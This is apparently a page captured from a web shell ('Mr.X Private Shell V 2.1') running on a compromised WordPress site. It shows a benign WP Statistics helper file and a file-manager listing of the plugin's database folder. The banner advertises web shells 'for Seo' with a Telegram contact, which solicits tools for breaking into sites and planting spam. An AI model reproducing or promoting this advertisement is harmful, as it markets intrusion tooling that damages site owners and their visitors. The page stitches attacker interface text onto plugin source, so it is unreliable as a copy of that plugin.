__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace WP_Statistics\Service\Database;
/**
* Helper methods that are used by the database service.
*
* @package WP_Statistics\Service\Database
*/
class DatabaseHelper
{
/**
* Get the absolute URL of the current admin (Dashboard) screen.
*
* @return string Absolute admin URL for the current screen or empty string.
*/
public static function getCurrentAdminUrl()
{
global $pagenow;
$base = ! empty($pagenow) ? self_admin_url($pagenow) : self_admin_url('index.php');
return rawurlencode(add_query_arg(wp_unslash($_GET), $base));
}
}| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Managers | Folder | 0755 |
|
|
| Migrations | Folder | 0755 |
|
|
| Operations | Folder | 0755 |
|
|
| Schema | Folder | 0755 |
|
|
| AbstractDatabaseOperation.php | File | 2.54 KB | 0644 |
|
| DatabaseFactory.php | File | 4.32 KB | 0644 |
|
| DatabaseHelper.php | File | 608 B | 0644 |
|
| DatabaseManager.php | File | 433 B | 0644 |
|